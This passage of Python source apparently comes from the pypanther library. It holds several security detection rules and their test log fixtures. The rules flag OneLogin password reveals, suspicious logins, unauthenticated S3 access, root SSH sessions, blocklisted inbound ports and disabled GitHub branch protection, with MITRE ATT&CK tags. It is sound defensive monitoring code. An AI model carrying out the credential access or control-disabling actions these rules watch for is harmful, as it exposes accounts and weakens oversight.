                "uuid": "37821E12-CC8A-5AA3-A90C-FAB28A5BF8F9",
                "version": "5.10.2",
                "watcher": "92",
            },
            "counter": "255",
            "decorations": {"host_uuid": "1111", "environment": "corp"},
            "epoch": "0",
            "hostIdentifier": "test.lan",
            "log_type": "result",
            "name": "pack_it-compliance_osquery_info",
            "unixTime": "1536682461",
        },
    ),
]


class OsqueryOutdatedAgent(PantherRule):
    RuleID = "Osquery.OutdatedAgent-prototype"
    DisplayName = "Osquery Agent Outdated"
    LogTypes = [PantherLogType.Osquery_Differential]
    Tags = ["Osquery", "Compliance"]
    Severity = PantherSeverity.Info
    Description = "Keep track of osquery versions, current is 5.10.2."
    Runbook = "Update the osquery agent."
    Reference = "https://www.osquery.io/downloads/official/5.10.2"
    SummaryAttributes = ["name", "hostIdentifier", "action"]
    Tests = osquery_outdated_agent_tests
    LATEST_VERSION = "5.10.2"

    def rule(self, event):
        return (
            event.get("name") == "pack_it-compliance_osquery_info"
            and deep_get(event, "columns", "version") != self.LATEST_VERSION
            and (event.get("action") == "added")
        )

    def title(self, event):
        return f"Osquery Version {deep_get(event, 'columns', 'version')} is Outdated"



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.log_types import PantherLogType

one_login_password_access_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="User accessed their own password",
        ExpectedResult=False,
        Log={
            "event_type_id": "240",
            "actor_user_id": 123456,
            "actor_user_name": "Bob Cat",
            "user_id": 123456,
            "user_name": "Bob Cat",
        },
    ),
    PantherRuleTest(
        Name="User accessed another user's password",
        ExpectedResult=True,
        Log={
            "event_type_id": "240",
            "actor_user_id": 654321,
            "actor_user_name": "Mountain Lion",
            "user_id": 123456,
            "user_name": "Bob Cat",
        },
    ),
]


class OneLoginPasswordAccess(PantherRule):
    RuleID = "OneLogin.PasswordAccess-prototype"
    DisplayName = "OneLogin Password Access"
    LogTypes = [PantherLogType.OneLogin_Events]
    Tags = ["OneLogin", "Credential Access:Unsecured Credentials"]
    Reports = {"MITRE ATT&CK": ["TA0006:T1552"]}
    Severity = PantherSeverity.Medium
    Description = "User accessed another user's application password\n"
    Reference = "https://onelogin.service-now.com/kb_view_customer.do?sysparm_article=KB0010598"
    Runbook = "Investigate whether this was authorized access.\n"
    SummaryAttributes = ["account_id", "user_name", "user_id"]
    Tests = one_login_password_access_tests

    def rule(self, event):
        # Filter events; event type 240 is actor_user revealed user's app password
        if (
            str(event.get("event_type_id")) != "240"
            or not event.get("actor_user_id")
            or (not event.get("user_id"))
        ):
            return False
        # Determine if actor_user accessed another user's password
        return event.get("actor_user_id") != event.get("user_id")

    def dedup(self, event):
        return event.get("actor_user_name") + ":" + event.get("app_name", "<UNKNOWN_APP>")

    def title(self, event):
        return f"A user [{event.get('actor_user_name', '<UNKNOWN_USER>')}] accessed another user's [{event.get('user_name', '<UNKNOWN_USER>')}] [{event.get('app_name', '<UNKNOWN_APP>')}] password"



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import deep_get
from pypanther.log_types import PantherLogType

g_suite_suspicious_logins_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Normal Login Event",
        ExpectedResult=False,
        Log={
            "id": {"applicationName": "login"},
            "kind": "admin#reports#activity",
            "type": "account_warning",
            "name": "login_success",
            "parameters": {"affected_email_address": "bobert@ext.runpanther.io"},
        },
    ),
    PantherRuleTest(
        Name="Account Warning Not For Suspicious Login",
        ExpectedResult=False,
        Log={
            "id": {"applicationName": "login"},
            "kind": "admin#reports#activity",
            "type": "account_warning",
            "name": "account_disabled_spamming",
            "parameters": {"affected_email_address": "bobert@ext.runpanther.io"},
        },
    ),
    PantherRuleTest(
        Name="Account Warning For Suspicious Login",
        ExpectedResult=True,
        Log={
            "id": {"applicationName": "login"},
            "kind": "admin#reports#activity",
            "type": "account_warning",
            "name": "suspicious_login",
            "parameters": {"affected_email_address": "bobert@ext.runpanther.io"},
        },
    ),
]


class GSuiteSuspiciousLogins(PantherRule):
    RuleID = "GSuite.SuspiciousLogins-prototype"
    DisplayName = "Suspicious GSuite Login"
    LogTypes = [PantherLogType.GSuite_ActivityEvent]
    Tags = ["GSuite"]
    Severity = PantherSeverity.Medium
    Description = "GSuite reported a suspicious login for this user.\n"
    Reference = "https://support.google.com/a/answer/7102416?hl=en"
    Runbook = "Checkout the details of the login and verify this behavior with the user to ensure the account wasn't compromised.\n"
    SummaryAttributes = ["actor:email"]
    Tests = g_suite_suspicious_logins_tests
    SUSPICIOUS_LOGIN_TYPES = {
        "suspicious_login",
        "suspicious_login_less_secure_app",
        "suspicious_programmatic_login",
    }

    def rule(self, event):
        if deep_get(event, "id", "applicationName") != "login":
            return False
        return bool(event.get("name") in self.SUSPICIOUS_LOGIN_TYPES)

    def title(self, event):
        user = deep_get(event, "parameters", "affected_email_address")
        if not user:
            user = "<UNKNOWN_USER>"
        return f"A suspicious login was reported for user [{user}]"



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import aws_rule_context
from pypanther.log_types import PantherLogType

awss3_server_access_unauthenticated_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Authenticated Access",
        ExpectedResult=False,
        Log={
            "bucket": "example-bucket",
            "requester": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be",
        },
    ),
    PantherRuleTest(
        Name="Unauthenticated Access", ExpectedResult=True, Log={"bucket": "example-bucket"}
    ),
]


class AWSS3ServerAccessUnauthenticated(PantherRule):
    RuleID = "AWS.S3.ServerAccess.Unauthenticated-prototype"
    DisplayName = "AWS S3 Unauthenticated Access"
    Enabled = False
    LogTypes = [PantherLogType.AWS_S3ServerAccess]
    Tags = [
        "AWS",
        "Configuration Required",
        "Security Control",
        "Collection:Data From Cloud Storage Object",
    ]
    Reports = {"MITRE ATT&CK": ["TA0009:T1530"]}
    Severity = PantherSeverity.Low
    Description = (
        "Checks for S3 access attempts where the requester is not an authenticated AWS user.\n"
    )
    Runbook = "If unauthenticated S3 access is not expected for this bucket, update its access policies.\n"
    Reference = "https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-auth-workflow-bucket-operation.html"
    SummaryAttributes = ["bucket", "key", "requester"]
    Tests = awss3_server_access_unauthenticated_tests
    # A list of buckets where authenticated access is expected
    AUTH_BUCKETS = {"example-bucket"}

    def rule(self, event):
        return event.get("bucket") in self.AUTH_BUCKETS and (not event.get("requester"))

    def title(self, event):
        return f"Unauthenticated access to S3 Bucket [{event.get('bucket', '<UNKNOWN_BUCKET')}]"

    def alert_context(self, event):
        return aws_rule_context(event)



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.log_types import PantherLogType

one_login_password_changed_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="User changed their password",
        ExpectedResult=True,
        Log={
            "event_type_id": "11",
            "actor_user_id": 123456,
            "actor_user_name": "Bob Cat",
            "user_id": 123456,
            "user_name": "Bob Cat",
        },
    ),
    PantherRuleTest(
        Name="User changed another's password",
        ExpectedResult=True,
        Log={
            "event_type_id": "11",
            "actor_user_id": 654321,
            "actor_user_name": "Mountain Lion",
            "user_id": 123456,
            "user_name": "Bob Cat",
        },
    ),
    PantherRuleTest(
        Name="Admin user changed another's password",
        ExpectedResult=False,
        Log={
            "event_type_id": "211",
            "actor_user_id": 654321,
            "actor_user_name": "Mountain Lion",
            "user_id": 123456,
            "user_name": "Bob Cat",
        },
    ),
]


class OneLoginPasswordChanged(PantherRule):
    RuleID = "OneLogin.PasswordChanged-prototype"
    DisplayName = "OneLogin User Password Changed"
    LogTypes = [PantherLogType.OneLogin_Events]
    Tags = ["OneLogin", "Identity & Access Management"]
    Severity = PantherSeverity.Info
    Description = "A user password was updated.\n"
    Reference = "https://onelogin.service-now.com/kb_view_customer.do?sysparm_article=KB0010510"
    Runbook = "Investigate whether this was an authorized action.\n"
    SummaryAttributes = ["account_id", "user_name", "user_id"]
    Tests = one_login_password_changed_tests

    def rule(self, event):
        # check that this is a password change event;
        # event id 11 is actor_user changed password for user
        # Normally, admin's may change a user's password (event id 211)
        return str(event.get("event_type_id")) == "11"

    def title(self, event):
        return f"A user [{event.get('user_name', '<UNKNOWN_USER>')}] password changed by user [{event.get('actor_user_name', '<UNKNOWN_USER>')}]"



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.log_types import PantherLogType

teleport_root_login_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="User logged in as root",
        ExpectedResult=True,
        Log={
            "addr_remote": "192.0.2.1:35194",
            "cluster_name": "teleport.example.com",
            "code": "t2000i",
            "ei": 0,
            "event": "session.start",
            "initial_command": [""],
            "login": "root",
            "namespace": "default",
            "proto": "ssh",
            "server_hostname": "ip-10-0-0-1.us-west-2.compute.internal",
            "server_id": "12345678-1111-2222-3333-54e9467ff0e6",
            "server_labels": {"env": "prod", "role": "project123"},
            "session_recording": "node-sync",
            "sid": "12345678-1111-2222-3333-54e9467ff0e6",
            "size": "80:25",
            "time": "2023-09-18 11:22:33",
            "uid": "12345678-1111-2222-3333-54e9467ff0e6",
            "user": "max.mustermann@zumbeispiel.example",
        },
    )
]


class TeleportRootLogin(PantherRule):
    RuleID = "Teleport.RootLogin-prototype"
    DisplayName = "User Logged in as root"
    LogTypes = [PantherLogType.Gravitational_TeleportAudit]
    Tags = ["SSH", "Execution:Command and Scripting Interpreter", "Teleport"]
    Severity = PantherSeverity.Medium
    Description = "A User logged in as root"
    Reports = {"MITRE ATT&CK": ["TA0002:T1059"]}
    Reference = "https://goteleport.com/docs/management/admin/"
    Runbook = "Use user accounts and policies, rather than root when logging in. With access to root, it is possible to evade auditing and logging.\n"
    SummaryAttributes = ["event", "code", "user", "login", "server_hostname", "server_labels"]
    Tests = teleport_root_login_tests

    def rule(self, event):
        return event.get("event") == "session.start" and event.get("login") == "root"

    def title(self, event):
        return f"User [{event.get('user', '<UNKNOWN_USER>')}] logged into [{event.get('server_hostname', '<UNKNOWN_HOSTNAME>')}] as root on [{event.get('cluster_name', '<UNKNOWN_CLUSTER>')}]"



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.log_types import PantherLogType

zoom_all_meetings_secured_with_one_option_disabled_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Turn off",
        ExpectedResult=True,
        Log={
            "action": "Update",
            "category_type": "Account",
            "operation_detail": "Security  - Require that all meetings are secured with one security option: from On to Off",
            "operator": "example@example.io",
            "time": "2022-12-16 18:15:38",
        },
    ),
    PantherRuleTest(
        Name="Turn on",
        ExpectedResult=False,
        Log={
            "action": "Update",
            "category_type": "Account",
            "operation_detail": "Security  - Require that all meetings are secured with one security option: from Off to On",
            "operator": "example@example.io",
            "time": "2022-12-16 18:15:38",
        },
    ),
    PantherRuleTest(
        Name="Non admin user update",
        ExpectedResult=False,
        Log={
            "action": "Update",
            "category_type": "User",
            "operation_detail": "Update User example@example.io  - Job Title: set to Contractor",
            "operator": "homer@example.io",
        },
    ),
]


class ZoomAllMeetingsSecuredWithOneOptionDisabled(PantherRule):
    Description = "A Zoom User turned off your organization's requirement that all meetings are secured with one security option."
    DisplayName = "Zoom All Meetings Secured With One Option Disabled"
    Runbook = "Confirm this user acted with valid business intent and determine whether this activity was authorized."
    Reference = "https://support.zoom.com/hc/en/article?id=zm_kb&sysparm_article=KB0059862"
    Severity = PantherSeverity.Medium
    LogTypes = [PantherLogType.Zoom_Operation]
    RuleID = "Zoom.All.Meetings.Secured.With.One.Option.Disabled-prototype"
    Tests = zoom_all_meetings_secured_with_one_option_disabled_tests

    def rule(self, event):
        operation_detail = event.get("operation_detail", "<NO_OPS_DETAIL>")
        operation_flag = (
            "Require that all meetings are secured with one security option: from On to Off"
        )
        return (
            event.get("action", "<NO_ACTION>") == "Update"
            and event.get("category_type", "<NO_CATEGORY_TYPE>") == "Account"
            and (operation_flag in operation_detail)
        )

    def title(self, event):
        return f"Zoom User [{event.get('operator', '<NO_OPERATOR>')}] turned off your organization's requirement to secure all meetings with one security option."



from typing import List

import pypanther.helpers.panther_event_type_helpers as event_type
from pypanther.base import PantherDataModel, PantherDataModelMapping
from pypanther.helpers.panther_base_helpers import deep_get
from pypanther.log_types import PantherLogType


def get_event_type(event):
    # pylint: disable=too-many-return-statements
    if (
        event.get("eventType") == "user.session.start"
        and event.get("outcome", {}).get("result") == "FAILURE"
    ):
        return event_type.FAILED_LOGIN
    if (
        event.get("eventType") == "user.session.start"
        and event.get("outcome", {}).get("result") == "SUCCESS"
    ):
        return event_type.SUCCESSFUL_LOGIN
    if event.get("eventType") in ["user.mfa.factor.deactivate", "user.mfa.factor.suspend"]:
        if event.get("outcome", {}).get("reason", "").startswith("User reset"):
            return event_type.MFA_RESET
        return event_type.MFA_DISABLED

    if event.get("eventType") in [
        "user.mfa.factor.activate",
        "user.mfa.factor.unsuspend",
        "user.mfa.factor.update ",
    ]:
        return event_type.MFA_ENABLED

    if event.get("eventType") == "system.mfa.factor.deactivate":
        return event_type.ADMIN_MFA_DISABLED
    return None


def get_actor_user(event):
    actor = deep_get(event, "actor", "displayName", default="unknown")
    if actor == "unknown":
        actor = deep_get(event, "actor", "alternateId", default="Unknown User")
    return actor


class StandardOktaSystemLog(PantherDataModel):
    DataModelID: str = "Standard.Okta.SystemLog"
    DisplayName: str = "Okta System Log"
    Enabled: bool = True
    LogTypes: List[str] = [PantherLogType.Okta_SystemLog]
    Mappings: List[PantherDataModelMapping] = [
        PantherDataModelMapping(Name="actor_user", Method=get_actor_user),
        PantherDataModelMapping(Name="event_type", Method=get_event_type),
        PantherDataModelMapping(Name="source_ip", Path="$.client.ipAddress"),
        PantherDataModelMapping(Name="user_agent", Path="$.client.userAgent.rawUserAgent"),
    ]



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import deep_get
from pypanther.helpers.panther_config import config
from pypanther.log_types import PantherLogType

box_event_triggered_externally_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Regular Event",
        ExpectedResult=False,
        Log={
            "type": "event",
            "additional_details": '{"key": "value"}',
            "created_by": {
                "id": "12345678",
                "type": "user",
                "login": "cat@example.com",
                "name": "Bob Cat",
            },
            "event_type": "DELETE",
        },
    ),
    PantherRuleTest(
        Name="Previewed Anonymously",
        ExpectedResult=True,
        Log={
            "created_by": {"id": "2", "type": "user", "name": "Unknown User"},
            "event_type": "PREVIEW",
            "type": "event",
            "ip_address": "1.2.3.4",
        },
    ),
    PantherRuleTest(
        Name="Missing Created By",
        ExpectedResult=False,
        Log={"event_type": "PREVIEW", "type": "event", "ip_address": "1.2.3.4"},
    ),
]


class BoxEventTriggeredExternally(PantherRule):
    RuleID = "Box.Event.Triggered.Externally-prototype"
    DisplayName = "Box event triggered by unknown or external user"
    Enabled = False
    LogTypes = [PantherLogType.Box_Event]
    Tags = ["Box", "Exfiltration:Exfiltration Over Web Service", "Configuration Required"]
    Reports = {"MITRE ATT&CK": ["TA0010:T1567"]}
    Severity = PantherSeverity.Medium
    Description = "An external user has triggered a box enterprise event.\n"
    Reference = (
        "https://support.box.com/hc/en-us/articles/8391393127955-Using-the-Enterprise-Event-Stream"
    )
    Runbook = "Investigate whether this user's activity is expected.\n"
    SummaryAttributes = ["ip_address"]
    Threshold = 10
    Tests = box_event_triggered_externally_tests
    DOMAINS = {"@" + domain for domain in config.ORGANIZATION_DOMAINS}

    def rule(self, event):
        # Check that all events are triggered by internal users
        if event.get("event_type") not in ("FAILED_LOGIN", "SHIELD_ALERT"):
            user = event.get("created_by", {})
            # user id 2 indicates an anonymous user
            if user.get("id", "") == "2":
                return True
            return bool(
                user.get("login")
                and (not any((user.get("login", "").endswith(x) for x in self.DOMAINS)))
            )
        return False

    def title(self, event):
        return f"External user [{deep_get(event, 'created_by', 'login', default='<UNKNOWN_USER>')}] triggered a box event."



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import ZENDESK_CHANGE_DESCRIPTION
from pypanther.log_types import PantherLogType

zendesk_user_suspension_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Zendesk - Suspension Enabled",
        ExpectedResult=True,
        Log={
            "url": "https://myzendek.zendesk.com/api/v2/audit_logs/111222333444.json",
            "id": 123456789123,
            "action_label": "Updated",
            "actor_id": 123,
            "actor_name": "John Doe",
            "source_id": 123,
            "source_type": "user_setting",
            "source_label": "Suspension state: Bob Cat",
            "action": "create",
            "change_description": "Suspended",
            "ip_address": "127.0.0.1",
            "created_at": "2021-05-28T18:39:50Z",
            "p_log_type": "Zendesk.Audit",
        },
    ),
    PantherRuleTest(
        Name="Zendesk - Suspension Disabled",
        ExpectedResult=True,
        Log={
            "url": "https://myzendek.zendesk.com/api/v2/audit_logs/111222333444.json",
            "id": 123456789123,
            "action_label": "Updated",
            "actor_id": 123,
            "actor_name": "John Doe",
            "source_id": 123,
            "source_type": "user_setting",
            "source_label": "Suspension state: Bob Cat",
            "action": "update",
            "change_description": "Unsuspended",
            "ip_address": "127.0.0.1",
            "created_at": "2021-05-28T18:39:50Z",
            "p_log_type": "Zendesk.Audit",
        },
    ),
    PantherRuleTest(
        Name="Zendesk - Admin Role Assigned",
        ExpectedResult=False,
        Log={
            "url": "https://myzendek.zendesk.com/api/v2/audit_logs/111222333444.json",
            "id": 123456789123,
            "action_label": "Updated",
            "actor_id": 123,
            "actor_name": "John Doe",
            "source_id": 123,
            "source_type": "user",
            "source_label": "Bob Cat",
            "action": "update",
            "change_description": "Role changed from End User to Administrator",
            "ip_address": "127.0.0.1",
            "created_at": "2021-05-28T18:39:50Z",
            "p_log_type": "Zendesk.Audit",
        },
    ),
]


class ZendeskUserSuspension(PantherRule):
    RuleID = "Zendesk.UserSuspension-prototype"
    DisplayName = "Zendesk User Suspension Status Changed"
    LogTypes = [PantherLogType.Zendesk_Audit]
    Tags = ["Zendesk", "Impact:Account Access Removal"]
    Reports = {"MITRE ATT&CK": ["TA0040:T1531"]}
    Severity = PantherSeverity.High
    Description = "A user's Zendesk suspension status was changed."
    Runbook = "Ensure the user's suspension status is appropriate."
    Reference = "https://support.zendesk.com/hc/en-us/articles/4408889293978-Suspending-a-user#:~:text=select%20Unsuspend%20access.-,Identifying%20suspended%20users,name%20on%20the%20Customers%20page"
    SummaryAttributes = ["p_any_ip_addresses"]
    Tests = zendesk_user_suspension_tests
    USER_SUSPENSION_ACTIONS = {"create", "update"}

    def rule(self, event):
        return (
            event.get("source_type") == "user_setting"
            and event.get("action", "") in self.USER_SUSPENSION_ACTIONS
            and ("suspended" in event.get(ZENDESK_CHANGE_DESCRIPTION, "").lower())
        )

    def title(self, event):
        suspension_status = event.get(ZENDESK_CHANGE_DESCRIPTION, "").lower()
        user = event.get("source_label", "<UNKNOWN_USER>").split(":")
        if len(user) > 1:
            user = user[1].strip()
        return f"Actor user [{event.udm('actor_user')}] {suspension_status} user [{user}]"

    def severity(self, event):
        if event.get(ZENDESK_CHANGE_DESCRIPTION, "").lower() == "suspended":
            return "INFO"
        return "HIGH"



from ipaddress import ip_network
from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import aws_rule_context
from pypanther.log_types import PantherLogType

awsvpc_inbound_port_blacklist_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Public to Private IP on Restricted Port",
        ExpectedResult=True,
        Log={
            "dstPort": 22,
            "dstAddr": "10.0.0.1",
            "srcAddr": "1.1.1.1",
            "p_log_type": "AWS.VPCFlow",
        },
    ),
    PantherRuleTest(
        Name="Public to Private IP on Allowed Port",
        ExpectedResult=False,
        Log={
            "dstPort": 443,
            "dstAddr": "10.0.0.1",
            "srcAddr": "1.1.1.1",
            "p_log_type": "AWS.VPCFlow",
        },
    ),
    PantherRuleTest(
        Name="Private to Private IP on Restricted Port",
        ExpectedResult=False,
        Log={
            "dstPort": 22,
            "dstAddr": "10.0.0.1",
            "srcAddr": "10.10.10.1",
            "p_log_type": "AWS.VPCFlow",
        },
    ),
    PantherRuleTest(
        Name="Public to Private IP on Restricted Port - OCSF",
        ExpectedResult=True,
        Log={
            "dst_endpoint": {"ip": "10.0.0.1", "port": 22},
            "src_endpoint": {"ip": "1.1.1.1"},
            "p_log_type": "OCSF.NetworkActivity",
        },
    ),
    PantherRuleTest(
        Name="Public to Private IP on Allowed Port - OCSF",
        ExpectedResult=False,
        Log={
            "dst_endpoint": {"ip": "10.0.0.1", "port": 443},
            "src_endpoint": {"ip": "1.1.1.1"},
            "p_log_type": "OCSF.NetworkActivity",
        },
    ),
]


class AWSVPCInboundPortBlacklist(PantherRule):
    RuleID = "AWS.VPC.InboundPortBlacklist-prototype"
    DisplayName = "VPC Flow Logs Inbound Port Blocklist"
    Enabled = False
    LogTypes = [PantherLogType.AWS_VPCFlow, PantherLogType.OCSF_NetworkActivity]
    Tags = [
        "AWS",
        "DataModel",
        "Configuration Required",
        "Security Control",
        "Command and Control:Non-Standard Port",
    ]
    Reports = {"MITRE ATT&CK": ["TA0011:T1571"]}
    Reference = "https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs.html"
    Severity = PantherSeverity.High
    Description = "VPC Flow Logs observed inbound traffic violating the port blocklist.\n"
    Runbook = "Block the unapproved traffic, or update the unapproved ports list.\n"
    SummaryAttributes = ["srcaddr", "dstaddr", "dstport"]
    Tests = awsvpc_inbound_port_blacklist_tests
    CONTROLLED_PORTS = {22, 3389}

    def rule(self, event):
        # Only monitor for blocklisted ports
        #
        # Defaults to True (no alert) if 'dstport' is not present
        if event.udm("destination_port") not in self.CONTROLLED_PORTS:
            return False
        # Only monitor for traffic coming from non-private IP space
        #
        # Defaults to True (no alert) if 'srcaddr' key is not present
        source_ip = event.udm("source_ip") or "0.0.0.0/32"
        if not ip_network(source_ip).is_global:
            return False
        # Alert if the traffic is destined for internal IP addresses
        #
        # Defaults to False(no alert) if 'dstaddr' key is not present
        destination_ip = event.udm("destination_ip") or "1.0.0.0/32"
        return not ip_network(destination_ip).is_global

    def alert_context(self, event):
        return aws_rule_context(event)



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.log_types import PantherLogType

git_hub_branch_protection_disabled_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="GitHub - Branch Protection Disabled",
        ExpectedResult=True,
        Log={
            "actor": "cat",
            "action": "protected_branch.destroy",
            "created_at": 1621305118553,
            "org": "my-org",
            "p_log_type": "GitHub.Audit",
            "repo": "my-org/my-repo",
        },
    ),
    PantherRuleTest(
        Name="GitHub - Protected Branch Name Updated",
        ExpectedResult=False,
        Log={
            "actor": "cat",
            "action": "protected_branch.update_name",
            "created_at": 1621305118553,
            "org": "my-org",
            "p_log_type": "GitHub.Audit",
            "repo": "my-org/my-repo",
        },
    ),
]


class GitHubBranchProtectionDisabled(PantherRule):
    RuleID = "GitHub.Branch.ProtectionDisabled-prototype"
    DisplayName = "GitHub Branch Protection Disabled"
    LogTypes = [PantherLogType.GitHub_Audit]
    Tags = ["GitHub", "Initial Access:Supply Chain Compromise"]
    Reports = {"MITRE ATT&CK": ["TA0001:T1195"]}
    Severity = PantherSeverity.High
    Description = "Disabling branch protection controls could indicate malicious use of admin credentials in an attempt to hide activity."
    Runbook = "Verify that branch protection should be disabled on the repository and re-enable as necessary."
    Reference = "https://docs.github.com/en/repositories/configuring-branches-and-merges-in-your-repository/managing-protected-branches/managing-a-branch-protection-rule"
    Tests = git_hub_branch_protection_disabled_tests

    def rule(self, event):
        return event.get("action") == "protected_branch.destroy"

    def title(self, event):
        return f"A branch protection was removed from the repository [{event.get('repo', '<UNKNOWN_REPO>')}] by [{event.get('actor', '<UNKNOWN_ACTOR>')}]"



from pypanther.base import PantherDataModel as PantherDataModel
from pypanther.base import PantherDataModelMapping as PantherDataModelMapping
from pypanther.base import PantherRule as PantherRule
from pypanther.base import PantherRuleMock as PantherRuleMock
from pypanther.base import PantherRuleTest as PantherRuleTest
from pypanther.base import PantherSeverity as PantherSeverity
from pypanther.get import get_panther_rules as get_panther_rules
from pypanther.log_types import PantherLogType as PantherLogType
from pypanther.registry import register as register
from pypanther.registry import registered_rules as registered_rules
